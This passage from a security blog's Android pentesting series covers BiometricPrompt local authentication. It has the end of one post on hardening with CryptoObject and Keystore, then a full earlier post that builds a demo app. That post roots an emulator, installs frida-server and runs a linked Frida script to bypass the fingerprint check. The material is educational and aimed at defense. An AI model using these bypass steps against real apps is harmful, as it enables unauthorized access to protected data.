               cipher.init(Cipher.DECRYPT_MODE, key, gcmSpec)  // Use provided IV
           }
           true
       } catch (e: Exception) {
           e.printStackTrace()
           false
       }
   }

   // Show biometric prompt and tie it to the cipher object
   private fun showBiometricPrompt() {
       val executor = ContextCompat.getMainExecutor(this)
       val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
           override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
               super.onAuthenticationSucceeded(result)
               val cryptoObject = result.cryptoObject
               if (cryptoObject != null &amp;&amp; cryptoObject.cipher != null) {
                   try {
                       val decryptedData = decryptData(cryptoObject)
                       if (decryptedData == null || !isValidData(decryptedData)) {
                           Toast.makeText(this@MainActivity, &quot;Decryption failed or invalid data!&quot;, Toast.LENGTH_SHORT).show()
                       } else {
                           showSuccess()
                       }
                   } catch (e: Exception) {
                       e.printStackTrace()
                       Toast.makeText(this@MainActivity, &quot;Decryption error!&quot;, Toast.LENGTH_SHORT).show()
                   }
               } else {
                   Toast.makeText(this@MainActivity, &quot;Authentication succeeded but CryptoObject is missing!&quot;, Toast.LENGTH_SHORT).show()
               }
           }
           override fun onAuthenticationFailed() {
               super.onAuthenticationFailed()
               Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
           }
       })

       if (initCipher(Cipher.DECRYPT_MODE, retrieveStoredIV())) {
           val cryptoObject = BiometricPrompt.CryptoObject(cipher)
           val promptInfo = BiometricPrompt.PromptInfo.Builder()
               .setTitle(&quot;Biometric Authentication&quot;)
               .setSubtitle(&quot;Log in using your fingerprint&quot;)
               .setNegativeButtonText(&quot;Use password&quot;)
               .build()

           biometricPrompt.authenticate(promptInfo, cryptoObject)
       }
   }

   // Updated: Fixing how cipher is used after biometric authentication completes
   private fun showBiometricPromptForEncryption(plainText: String) {
       val executor = ContextCompat.getMainExecutor(this)
       val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
           override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
               super.onAuthenticationSucceeded(result)
               val cryptoObject = result.cryptoObject
               if (cryptoObject != null) {
                   try {
                       // Encrypt after biometric authentication
                       val encryptedData = cryptoObject.cipher?.doFinal(plainText.toByteArray())
                       if (encryptedData != null) {
                           val iv = cryptoObject.cipher?.iv  // Get the generated IV
                           storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv!!)
                           Toast.makeText(this@MainActivity, &quot;Encryption successful!&quot;, Toast.LENGTH_SHORT).show()
                       }
                   } catch (e: Exception) {
                       e.printStackTrace()
                       Toast.makeText(this@MainActivity, &quot;Encryption error!&quot;, Toast.LENGTH_SHORT).show()
                   }
               }
           }

           override fun onAuthenticationFailed() {
               super.onAuthenticationFailed()
               Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
           }
       })

       if (initCipher(Cipher.ENCRYPT_MODE)) {
           val cryptoObject = BiometricPrompt.CryptoObject(cipher)
           val promptInfo = BiometricPrompt.PromptInfo.Builder()
               .setTitle(&quot;Biometric Authentication for Encryption&quot;)
               .setSubtitle(&quot;Use your fingerprint to encrypt data&quot;)
               .setNegativeButtonText(&quot;Use password&quot;)
               .build()

           biometricPrompt.authenticate(promptInfo, cryptoObject)
       }
   }

   // Check if decrypted data is valid
   private fun isValidData(decryptedData: ByteArray): Boolean {
       return decryptedData.contentEquals(expectedData)  // Example validation
   }

   // Decrypt data using the CryptoObject
   private fun decryptData(cryptoObject: BiometricPrompt.CryptoObject): ByteArray? {
       return try {
           val encryptedData = Base64.decode(retrieveEncryptedData(), Base64.DEFAULT)
           val iv = retrieveStoredIV()  // Retrieve the stored IV
           if (initCipher(Cipher.DECRYPT_MODE, iv)) {  // Use the retrieved IV
               val decryptedData = cryptoObject.cipher?.doFinal(encryptedData)
               decryptedData
           } else {
               null
           }
       } catch (e: Exception) {
           e.printStackTrace()
           null
       }
   }

   private fun encryptAndStoreData(plainText: String) {
       if (initCipher(Cipher.ENCRYPT_MODE)) {
           try {
               val encryptedData = cipher.doFinal(plainText.toByteArray())
               val iv = cipher.iv  // Get the generated IV
               storeEncryptedDataAndIV(Base64.encodeToString(encryptedData, Base64.DEFAULT), iv)
           } catch (e: Exception) {
               e.printStackTrace()
               Toast.makeText(this, &quot;Encryption failed&quot;, Toast.LENGTH_SHORT).show()
           }
       }
   }

   // Simulate storing encrypted data and IV (replace with actual storage logic)
   private fun storeEncryptedDataAndIV(encryptedData: String, iv: ByteArray) {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val editor = sharedPreferences.edit()
       editor.putString(&quot;encrypted_data&quot;, encryptedData)
       editor.putString(&quot;iv&quot;, Base64.encodeToString(iv, Base64.DEFAULT))  // Store the IV as Base64 string
       editor.apply()
   }

   // Retrieve encrypted data and IV
   private fun retrieveEncryptedData(): String {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       return sharedPreferences.getString(&quot;encrypted_data&quot;, &quot;&quot;) ?: &quot;&quot;
   }

   private fun retrieveStoredIV(): ByteArray {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val ivString = sharedPreferences.getString(&quot;iv&quot;, null)
       return Base64.decode(ivString, Base64.DEFAULT)
   }

   private fun showSuccess() {
       Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
       val intent = Intent(this, SuccessActivity::class.java)
       startActivity(intent)
       finish()  // Optionally finish MainActivity to prevent going back without re-authentication
   }
   private fun resetEncryptedData() {
       val sharedPreferences = getSharedPreferences(&quot;biometric_prefs&quot;, MODE_PRIVATE)
       val editor = sharedPreferences.edit()
       editor.remove(&quot;encrypted_data&quot;)  // Remove encrypted data
       editor.remove(&quot;iv&quot;)  // Remove IV
       editor.apply()
       Log.d(&quot;Reset&quot;, &quot;Encrypted data and IV reset.&quot;)
       Toast.makeText(this, &quot;Encrypted data reset.&quot;, Toast.LENGTH_SHORT).show()
   }
}

```
&lt;/details&gt;


# Testing the application

Once you have the code, you should be able to run it in Android Studio using an emulator without any issues. In a more &quot;realistic&quot; scenario, the application would typically include an input field where the user can enter a password, and the app would verify if it&apos;s correct. After that, the user would have the option to set up local authentication, so they wouldn’t need to enter the password every time they log in.

However, due to time constraints, I won’t be creating a full application with all these features. Instead, we’ll assume that the user has successfully set up local authentication using a simple &quot;store password&quot; button.

![](/content/images/2024/09/image-14.png)

First screen of the application

![](/content/images/2024/09/image-15.png)

Fingerprint authentication to encrypt the data

After this step, biometric authentication button should be used to access the app.

![](/content/images/2024/09/image-16.png)

Second screen

Now, if we repeat the process using **Objection**, after a successful authentication, we should be able to interact with the command-line interface (CLI). The first thing we notice is that the Keystore has successfully generated a symmetric key with the alias &quot;test.&quot; Thanks to how the Keystore operates, an attacker cannot retrieve the actual key value.

![](/content/images/2024/09/image-11.png)

Keystore data

On the other hand, if we navigate to the application&apos;s shared preferences directory, we can see the encrypted data along with the initialization vector (IV). Even though an attacker could access this data, if the user’s password is strong (unlike in this case, where the password is simply &quot;password&quot;), it would be difficult for an attacker to crack the encryption.

![](/content/images/2024/09/image-10.png)

Shared Preferences data

## Bypassing local authentication

In the previous chapter, we successfully bypassed the local authentication of the application using a Frida script. Now, we will attempt to do the same with the current version of the application.

The process remains the same as before. We start the application using Frida and load the script designed to bypass local authentication.

```bash
frida -U -f com.example.localauth -l global-bypass.js

```

![](/content/images/2024/09/image-12.png)

After launching the script and pressing the &quot;Biometric Authentication&quot; button, we encounter the following error:

![](/content/images/2024/09/image-13.png)

This error occurs because the script forces a successful authentication, but the `CryptoObject`&apos;s value is null, preventing the attacker from progressing to the second screen. This demonstrates that the application is now more secure, and bypassing the authentication process is no longer possible using the Frida script.

# Conclusions

In this chapter, we explored effective methods for securing biometric authentication in Android, focusing on the **CryptoObject** and the **Android Keystore**. These technologies, when used correctly, provide robust security, but it is essential to recognize that no system is completely impervious to attack. Skilled attackers, particularly those using tools like **Frida**, can potentially bypass local authentication mechanisms by hooking into the application and manipulating the authentication flow in real-time.

Our approach introduces a strong first line of defense by linking biometric authentication to cryptographic operations managed through the **Android Keystore**. This ensures that sensitive operations, such as encryption and decryption, are only performed after a valid biometric authentication. By enforcing proper validation of the **CryptoObject** and cipher, we mitigate attacks that attempt to exploit vulnerabilities like bypassing authentication with null or manipulated cryptographic objects.

However, even with these protections, attackers with sufficient expertise in reverse engineering can still target the validation logic itself. They might attempt to modify or replace the checks that validate the **CryptoObject** and its associated cryptographic operations. This underscores the necessity of implementing additional layers of security.

To further enhance protection, implementing **Frida detection** techniques can help identify and block runtime tampering attempts. Although Frida detection is not a definitive solution, it raises the difficulty level for attackers, forcing them to invest more time and resources into bypassing both the biometric authentication and the tamper-detection mechanisms.

When applied to a **REST API** architecture, these security practices become even more effective. By ensuring that API access is contingent upon a valid biometrically-signed token and that server-side validation is in place, attackers are faced with an additional layer of security that is much harder to breach. Integrating these practices into the API flow increases the overall complexity of any attack, making it significantly more difficult for attackers to bypass protections, especially when secure token management and authentication processes are employed on both the client and server sides.

In conclusion, while no security measure is completely invulnerable, particularly when attackers have physical access to the device or employ advanced tools like Frida, layering multiple defense mechanisms significantly increases the effort required to exploit the system. By combining biometric authentication with cryptographic security, tamper detection, and secure REST API practices, we can create a far more resilient security architecture, making it much harder for attackers to succeed.

# Resources

-   Biometric Authentication with BiometricPrompt. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/sign-in/biometric-auth](https://developer.android.com/training/sign-in/biometric-auth)
-   Frida Script to bypass Local Authentication. Available at: [https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android Keystore System. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/articles/keystore](https://developer.android.com/training/articles/keystore)
-   How Secure is Your Android Keystore Authentication? &quot;WithSecure Labs.&quot; Available at: [https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication](https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication)
-   OWASP Mobile Application Security Testing Guide (MASTG) - Biometric Authentication Testing. &quot;OWASP.&quot; Available at: [https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management](https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management)</content:encoded><author>Ruben Santos</author></item><item><title>Cracking Android Biometric Authentication with Frida</title><link>https://www.kayssel.com/post/android-7</link><guid isPermaLink="true">https://www.kayssel.com/post/android-7</guid><description>In this chapter of the Android pentesting series, we implemented local authentication using the BiometricPrompt API and demonstrated how it can be bypassed using Frida on a rooted emulator. We highlighted the importance of securing authentication to prevent bypass attacks.</description><pubDate>Sun, 15 Sep 2024 07:43:00 GMT</pubDate><content:encoded># Introduction

In this chapter of my **Android pentesting series**, I’ll take a closer look at **local authentication**—a critical security feature in modern apps. We’ll develop a small application to give you a hands-on understanding of how local authentication works using the **BiometricPrompt API**. After building the authentication layer, I’ll demonstrate how attackers can bypass it using **Frida** on a rooted emulator.

This practical approach will help you not only understand how to implement authentication but also reveal where its vulnerabilities lie and how they can be exploited.

In this chapter, I’ll cover:

-   Setting up the Android Emulator for biometric testing.
-   Developing and testing a basic **BiometricPrompt** authentication app.
-   Bypassing authentication using **Frida**.
-   Identifying common weaknesses in basic authentication setups.

By the end, you’ll have a solid grasp of how local authentication works, its limitations, and how to protect against potential bypass attacks. In future chapters, we’ll dive deeper into securing the authentication flow and leveraging cryptographic operations to strengthen your app’s security.

# Using Android Studio Emulator for Biometric Testing

To accurately test biometric features such as fingerprint authentication, it&apos;s recommended to use the **Android Emulator** from **Android Studio** rather than third-party virtual machines. The Android Emulator provides built-in support for fingerprint sensors, making it ideal for testing biometric features. Here&apos;s a brief setup guide:

1.  **Install Android Studio**: First, download and install Android Studio, then open your project or create a new one.
2.  **Set Up the Emulator**: Go to **Tools &gt; AVD Manager**, create a virtual device running Android 9.0 or higher (required for biometric support), and start the emulator.
3.  **Install ADB (Android Debug Bridge)**: Ensure you have ADB installed on your host machine. ADB is crucial for interacting with the emulator from the command line and for debugging your app. You can install ADB by following [this guide](https://developer.android.com/studio/command-line/adb).

For detailed steps on each process, refer to the following tutorials:

-   [Install Android Studio](https://developer.android.com/studio/install)
-   [Run Apps on the Android Emulator](https://developer.android.com/studio/run/emulator)
-   [ADB Installation Guide](https://developer.android.com/studio/command-line/adb)

With the emulator ready, it’s time to explore how Android manages local authentication. **BiometricPrompt** simplifies integrating biometric features like fingerprints and facial recognition into your app. Let’s delve into the key concepts of local authentication and how **BiometricPrompt** ensures secure user verification.

# Understanding BiometricPrompt and Local Authentication in Android

When developing secure Android applications, authentication is a critical aspect, and Android provides several methods to verify users locally—without the need for online services. One of the most important tools for local authentication today is **BiometricPrompt**, an API introduced in Android 9 (Pie) that simplifies the integration of biometric security features like fingerprints or facial recognition into your app.

## What is Local Authentication?

Local authentication is the process of verifying a user&apos;s identity directly on the device. Unlike remote authentication, which checks credentials on a server, local authentication ensures that access to certain data or features is controlled strictly within the app or the device itself.

Traditional methods of local authentication include:

-   **PINs** or **passwords**, where users manually enter a passcode.
-   **Pattern unlocks**, a method familiar to most Android users.

While these methods are still widely used, biometric authentication has become increasingly popular due to its convenience and higher level of security.

## Introduction to BiometricPrompt

**BiometricPrompt** is Android’s modern framework for managing biometric authentication. It offers a unified way to prompt users for biometric data, handle the sensitive information securely, and provide developers with a simple API to integrate this into apps.

### Why BiometricPrompt Matters

In earlier Android versions, developers used different APIs for each biometric type (e.g., FingerprintManager). This led to inconsistencies and security risks since developers had to handle more complexity themselves. **BiometricPrompt** solves this by:

-   **Standardizing biometric access**: Whether the user has a fingerprint scanner or face unlock, the same API manages it.
-   **Improving security**: Biometric data is handled inside the device’s **Trusted Execution Environment (TEE)** or **Secure Hardware**, which means neither the operating system nor any apps can directly access the biometric data.
-   **User experience**: It ensures a consistent and familiar authentication prompt across all apps, which helps users feel more secure.

### How BiometricPrompt Works

When you use BiometricPrompt in your app, here’s what happens under the hood:

1.  The system displays a secure prompt asking the user to authenticate using a registered biometric (e.g., fingerprint, face).
2.  Biometric data is captured and processed entirely in secure hardware, meaning the app never has direct access to the raw data.
3.  If authentication is successful, BiometricPrompt triggers a callback in the app, which can be used to unlock sensitive features or data.

The **BiometricPrompt API** also allows for secure cryptographic operations through its **CryptoObject** class. This feature binds a cryptographic operation (like signing or encrypting data) to successful biometric authentication, ensuring the app’s sensitive operations can only proceed when the user’s identity is confirmed. In the following chapters, we will delve deeper into how to leverage these cryptographic operations effectively, and how to secure them against potential bypass techniques.

# Code Explanation: Implementing Biometric Authentication in Android

Now that we’ve covered the theory behind **BiometricPrompt**, let&apos;s see how to implement it in practice. The following code example walks through setting up biometric authentication in an Android app, from verifying if the device supports biometrics to handling successful authentication.

#### MainActivity: Setting Up the Interface

The `MainActivity` is the entry point of the app, and the user interface is set up in the `onCreate()` method. The layout of the activity is defined in `activity_main.xml`, which includes a button (`btn_authenticate`). When the button is clicked, the app triggers the method `validateBiometricSupportAndAuthenticate()` to initiate the biometric authentication flow.

```kotlin
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_main)

    val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
    btnAuthenticate.setOnClickListener {
        validateBiometricSupportAndAuthenticate()
    }
}

```

The `setOnClickListener()` sets up a listener for the button, which calls the method to check for biometric support when pressed.

#### Checking for Biometric Support

The `validateBiometricSupportAndAuthenticate()` method uses the **BiometricManager** class to check if the device supports biometric authentication. The method evaluates several conditions, providing feedback using `Toast` messages to inform the user about the status of the biometric hardware and whether credentials are enrolled.

```kotlin
private fun validateBiometricSupportAndAuthenticate() {
    val biometricManager = BiometricManager.from(this)
    when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
        BiometricManager.BIOMETRIC_SUCCESS -&gt; {
            // The device supports biometric authentication
            showBiometricPrompt()
        }
        BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -&gt; {
            // The device does not have biometric hardware
            Toast.makeText(this, &quot;No biometric hardware available&quot;, Toast.LENGTH_SHORT).show()
        }
        BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -&gt; {
            // The biometric hardware is currently unavailable
            Toast.makeText(this, &quot;Biometric hardware currently unavailable&quot;, Toast.LENGTH_SHORT).show()
        }
        BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -&gt; {
            // No biometric credentials are enrolled on the device
            Toast.makeText(this, &quot;No biometric credentials enrolled&quot;, Toast.LENGTH_SHORT).show()
        }
    }
}


```

If the device supports biometric authentication (`BIOMETRIC_SUCCESS`), the app calls `showBiometricPrompt()` to proceed with the authentication process. If the device doesn&apos;t support biometrics or lacks enrolled credentials, appropriate error messages are displayed using `Toast`.

#### Displaying the Biometric Prompt

The `showBiometricPrompt()` method configures and displays the biometric authentication dialog. It sets up an **Executor** to manage the callbacks and ensure the authentication process runs smoothly on the main UI thread. The **BiometricPrompt** instance is created with an **AuthenticationCallback** that listens for success or failure of the authentication attempt.

```kotlin
private fun showBiometricPrompt() {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            super.onAuthenticationSucceeded(result)
            showSuccess()
        }

        override fun onAuthenticationFailed() {
            super.onAuthenticationFailed()
            Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
        }
    })


```

-   **onAuthenticationSucceeded()** is triggered when the user successfully authenticates, and it calls `showSuccess()`.
-   **onAuthenticationFailed()** handles authentication failures and informs the user via a `Toast`.

The biometric prompt is then configured using `BiometricPrompt.PromptInfo.Builder()`, where you define the title, subtitle, and a fallback option for users who choose not to use biometrics.

```kotlin
val promptInfo = BiometricPrompt.PromptInfo.Builder()
.setTitle(&quot;Biometric Authentication&quot;)
.setSubtitle(&quot;Log in using your fingerprint&quot;)
.setNegativeButtonText(&quot;Use password&quot;)
.build()
biometricPrompt.authenticate(promptInfo)

```

The **PromptInfo** dialog informs the user that they need to authenticate using their fingerprint. If the user prefers, they can select the &quot;Use password&quot; option to authenticate using a different method.

#### Handling Successful Authentication

When the user successfully authenticates, the `showSuccess()` method is invoked. This method displays a success message using `Toast` and navigates the user to a new activity (`SuccessActivity`) using an **Intent**. Optionally, `finish()` is called to close the `MainActivity`, preventing the user from navigating back to it without re-authenticating.

```kotlin
private fun showSuccess() {
    Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
    // Navigate to the SuccessActivity
    val intent = Intent(this, SuccessActivity::class.java)
    startActivity(intent)
    finish() // Optionally finish MainActivity to prevent going back without re-authentication
}

```

The transition to `SuccessActivity` completes the authentication process, showing that the user has been successfully authenticated.

```kotlin
package com.example.localauth

import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity

class SuccessActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_success)
    }
}


```

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```kt
package com.example.localauth

import android.os.Bundle
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricManager
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import android.content.Intent

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            validateBiometricSupportAndAuthenticate()
        }
    }

    private fun validateBiometricSupportAndAuthenticate() {
        val biometricManager = BiometricManager.from(this)
        when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
            BiometricManager.BIOMETRIC_SUCCESS -&gt; {
                // The device supports biometric authentication
                showBiometricPrompt()
            }
            BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -&gt; {
                // The device does not have biometric hardware
                Toast.makeText(this, &quot;No biometric hardware available&quot;, Toast.LENGTH_SHORT).show()
            }
            BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -&gt; {
                // The biometric hardware is currently unavailable
                Toast.makeText(this, &quot;Biometric hardware currently unavailable&quot;, Toast.LENGTH_SHORT).show()
            }
            BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -&gt; {
                // No biometric credentials are enrolled on the device
                Toast.makeText(this, &quot;No biometric credentials enrolled&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                showSuccess()
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication&quot;)
            .setSubtitle(&quot;Log in using your fingerprint&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        // Navigate to the SuccessActivity
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish() // Optionally finish MainActivity to prevent going back without re-authentication
    }
}


```
&lt;/details&gt;


## Layouts Explanation

The user interface for the app consists of two key layouts: one for the main activity where the user initiates authentication, and another for the success screen.

#### MainActivity Layout (`activity_main.xml`)

This layout defines a simple user interface using a **LinearLayout** that centers a button on the screen. The button is used to initiate biometric authentication.

```kotlin
&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;LinearLayout
    xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
    android:layout_width=&quot;match_parent&quot;
    android:layout_height=&quot;match_parent&quot;
    android:orientation=&quot;vertical&quot;
    android:gravity=&quot;center&quot;&gt;

    &lt;Button
        android:id=&quot;@+id/btn_authenticate&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:text=&quot;Biometric Authentication&quot; /&gt;
&lt;/LinearLayout&gt;

```

-   The **LinearLayout** ensures that the button is vertically centered on the screen.
-   The button, with `id=&quot;btn_authenticate&quot;`, displays the text &quot;Biometric Authentication&quot; and is linked to the `MainActivity` via the `findViewById()` method. When clicked, it initiates the authentication process.

#### SuccessActivity Layout (`activity_success.xml`)

This layout is for the success screen that the user sees after successful authentication. It contains a **TextView** displaying a success message and an **ImageView** for visual feedback.

```kotlin
&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;LinearLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
    android:layout_width=&quot;match_parent&quot;
    android:layout_height=&quot;match_parent&quot;
    android:orientation=&quot;vertical&quot;
    android:gravity=&quot;center&quot;
    android:padding=&quot;16dp&quot;&gt;

    &lt;TextView
        android:id=&quot;@+id/success_message&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:text=&quot;Access Granted!&quot;
        android:textSize=&quot;24sp&quot;
        android:textColor=&quot;@android:color/black&quot;
        android:layout_marginBottom=&quot;16dp&quot;/&gt;

    &lt;ImageView
        android:id=&quot;@+id/success_image&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:src=&quot;@drawable/charmander_victory&quot;
        android:contentDescription=&quot;Charmander showing victory&quot; /&gt;

&lt;/LinearLayout&gt;

```

-   The **TextView** displays the message &quot;Access Granted!&quot; with a large text size (24sp) and a bottom margin of `16dp` to provide spacing between the text and the image.
-   The **ImageView** displays an image (`charmander_victory`) that visually reinforces the success message. The image is centered below the text and uses the drawable resource `@drawable/charmander_victory`.

# Testing the App in the Android Studio Emulator

To begin testing the app, we first need to set up fingerprint authentication in the emulator. Start by navigating to the **Security** settings in the emulator and look for the **Pixel Imprint** option.

![](/content/images/2024/08/image-2.png)

Security Settings

Once inside the **Pixel Imprint** section, follow the instructions to register a fingerprint. You’ll be prompted to touch the sensor multiple times until the fingerprint is fully registered, as shown in the image below:

![](/content/images/2024/08/image-3.png)

Setting up the fingerprint

After successfully registering the fingerprint, you should see it listed under **Pixel Imprint** in the security settings.

![](/content/images/2024/08/image-4.png)

Saved fingerprint

With the fingerprint configured, it’s time to run the app. In Android Studio, simply press the **Run** button to deploy the application to the emulator.

![](/content/images/2024/09/image-9.png)

Running the application

If everything is set up correctly, the app’s user interface (UI) will appear in the emulator. As previously developed, the main layout contains a single button. By pressing this button, the app will prompt you to authenticate using the fingerprint you just set up.

![](/content/images/2024/08/image-6.png)

Accessing to the second screen with local authentication

If the correct fingerprint is provided, you’ll successfully authenticate and be taken to the second screen, which features a cheerful Charmander! 😆

![](/content/images/2024/08/image-7.png)

Cool Charmander

# Bypassing local authentication

Now that we have the application installed, it’s time to demonstrate how to bypass local authentication using a rooted emulator.

## Rooting the Emulator

The first step is to root the Android Studio emulator. To make this process simpler, we’ll use a script that automates everything for us. Follow these steps:

```bash
git clone https://gitlab.com/newbit/rootAVD.git
./rootAVD.sh ListAllAVDs

```

After running the script for the first time, it will provide instructions on how to root the device.

![](/content/images/2024/09/image.png)

Command to root the emulator

Simply copy and paste the command provided by the script into your terminal. The script will then handle the entire rooting process for you.

![](/content/images/2024/09/image-1.png)

Rooting the emulator

Once the emulator is rooted, you can verify root access by running the following commands:

```bash
adb shell
su 

```

At this point, a dialog will appear in the emulator asking for permission to grant root access. Press **Grant** to confirm. You should now have root access to the emulator.

![](/content/images/2024/09/image-2.png)

Accessing the rooted device

## Installing frida server

To install **Frida Server**, we’ll use a **Magisk** module that automates the process. You can download the module from the link below:

[GitHub - ViRb3/magisk-frida: 🔐 Run frida-server on boot with Magisk, always up-to-date](https://github.com/ViRb3/magisk-frida)

#### Installing the Module

First, transfer the `.zip` file from the module’s GitHub release page to the emulator using **ADB**:

```bash
adb push module.zip /sdcard/Download

```

Once the module is copied, open **Magisk** on the emulator and click **Install From Storage**. Then, select the `.zip` file you just transferred.

![](/content/images/2024/09/image-3.png)

Modules of Magisk

After the module is installed, enable it and restart the emulator.

![](/content/images/2024/09/image-4.png)

Installed Magisk Module

#### Verifying the Installation

If everything is set up correctly, you should see the Frida server running on port **27042**. To verify this, run the following command:

```bash
netstat -tupln | grep &quot;27042&quot; 

```

You should see the port listed as active.

![](/content/images/2024/09/image-5.png)

Frida server running

# Bypass using frida

Now that everything is set up, we’ll use **Frida** to bypass the local authentication in the app. This process is straightforward and allows you to test whether the application is vulnerable to this type of attack.

#### Download the Bypass Script

First, download the script from the following link:

[android-keystore-audit/frida-scripts/fingerprint-bypass.js at master · WithSecureLabs/android-keystore-audit](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)

This script performs several checks and, depending on the defenses implemented by the application, it will attempt different methods to bypass the authentication.

#### Running the Bypass Script

To use the script, launch the application with Frida by running the following command in your terminal:

```bash
frida -U -f com.example.localauth -l global-bypass.js

```

![](/content/images/2024/09/image-6.png)

Running the Frida script to bypass local authentication

Once the app is running, navigate to the main screen. When you press the button to authenticate, the Frida script will automatically bypass the authentication, granting you access to the second screen of the app.

![](/content/images/2024/09/image-8.png)

Accessing the second screen

### Conclusion

In this chapter of the **Android pentesting series**, we implemented a basic **local authentication** using **BiometricPrompt** and demonstrated how it can be bypassed using **Frida** on a rooted emulator.

Key insights:

-   The **BiometricPrompt API** provides a standard way to handle biometric authentication securely.
-   Rooted devices and tools like Frida expose vulnerabilities in basic authentication setups.
-   Strengthening code is crucial to preventing bypass attacks.

In the next chapter, we’ll focus on making the authentication process more robust and resistant to these kinds of attacks.

# Resources

-   Biometric Authentication with BiometricPrompt. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/sign-in/biometric-auth](https://developer.android.com/training/sign-in/biometric-auth)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android Emulator Setup for Pentesting. &quot;HackTricks.&quot; Available at: https://book.hacktricks.xyz/mobile-apps-pentesting/android-pentesting/android-emulator
-   Rooting the Android Emulator. &quot;RootAVD GitLab.&quot; Available at: [https://gitlab.com/newbit/rootAVD](https://gitlab.com/newbit/rootAVD)
-   Bypass Biometric Authentication in Android. &quot;HackTricks.&quot; Available at: [https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android](https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android)
